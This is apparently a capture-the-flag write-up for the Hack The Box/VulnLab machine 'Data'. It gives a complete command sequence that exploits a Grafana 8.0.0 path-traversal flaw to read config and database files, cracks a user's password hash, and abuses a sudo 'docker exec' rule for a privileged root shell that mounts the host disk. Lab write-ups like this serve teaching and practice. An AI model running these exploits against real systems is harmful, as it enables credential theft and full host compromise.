Data - Vulnlab(HTB)
Data – Easy Machine (Hack The Box, VL):
A very-easy-difficulty machine from the VulnLab on Hack The Box.
In this box, we exploit a known LFI vulnerability in Grafana, then escalate privileges via a sudo-assigned Docker exec permission.
Recon
Initial Nmap scan shows port 3000 open:
1
3000/tcp open http
Visiting http://<ip>:3000 reveals Grafana v8.0.0.
This version has a known LFI vulnerability. Reference: GitHub Security Advisory
LFI path:
1
<grafana_host_url>/public/plugins/alertlist/
Exploiting the LFI
We can exploit it using a simple curl request:
1
curl --path-as-is http://10.129.248.135:3000/public/plugins/alertlist/../../../../../../../../etc/grafana/grafana.ini
From the grafana.ini file, we find the path to the DB:
/var/lib/grafana/grafana.db
Download it:
1
curl --path-as-is http://10.129.248.135:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db -o grafana.db
Open the database:
1
2
3
sqlite3 grafana.db
sqlite> select * from user;
Example output:
1
2
3
1|0|admin|admin@localhost||7a919e4bbe95cf5104edf354ee2e6234efac1ca1f81426844a24c4df6131322cf3723c92164b6172e9e73faf7a4c2072f8f8|YObSoLj55S|hLLY6QQ4Y6||1|1|0||2022-01-23 12:48:04|2022-01-23 12:48:50|0|2022-01-23 12:48:50|0
2|0|boris|[email protected]|boris|dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe49353e35f53b51da8|LCBhdtJWjl|mYl941ma8w||1|0|0||2022-01-23 12:49:11|2022-01-23 12:49:11|0|2012-01-23 12:49:11|0
sqlite> exit
1
2
hash-> dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe49353e35f53b51da8`
salt-> LCBhdtJWjl
1
echo -n "dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe49353e35f53b51da8, LCBhdtJWjl > g.hsh"
Cracking the Hash
Grafana hashes are stored in a special format. To convert to hashcat format, use this script:
1
wget https://raw.githubusercontent.com/iamaldi/grafana2hashcat/refs/heads/main/grafana2hashcat.py
Prepare the hash file (g.hsh), then run:
1
2
python3 grafana2hashcat.py g.hsh -o hash
hashcat -m 10900 hash --wordlist wordlist.txt
Result:
1
boris : beautiful1
Privilege Escalation
Log in as boris and check sudo permissions:
1
sudo -l
Output:
1
2
User boris may run the following commands on localhost:
(root) NOPASSWD: /snap/bin/docker exec *
Find running containers:
1
ps aux | grep containerd
Example:
1
root 1598 0.0 0.4 713120 8620 ? Sl 20:55 0:00 /snap/docker/1125/bin/containerd-shim-runc-v2 -namespace moby -id e6ff5b1cbc85cdb2157879161e42a08c1062da655f5a6b7e24488342339
Spawn root shell in the container:
1
sudo /snap/bin/docker exec -it --privileged --user root e6ff5b1cbc85cdb2157879161e42a08c1062da655f5a6b7e24488342339 bash
Look for mounted host filesystem:
1
2
3
4
~$ mount
<SNIP>
/dev/sda1 on / type ext4 (rw,relatime)
<SNIP>
Mount and access root flag:
1
2
3
4
bash-5.1# mount /dev/sda1 /mnt
bash-5.1# cd /mnt
bash-5.1# cat root/root.txt
2616c*****b3ebc************
Thanks for reading this quick type of writeup.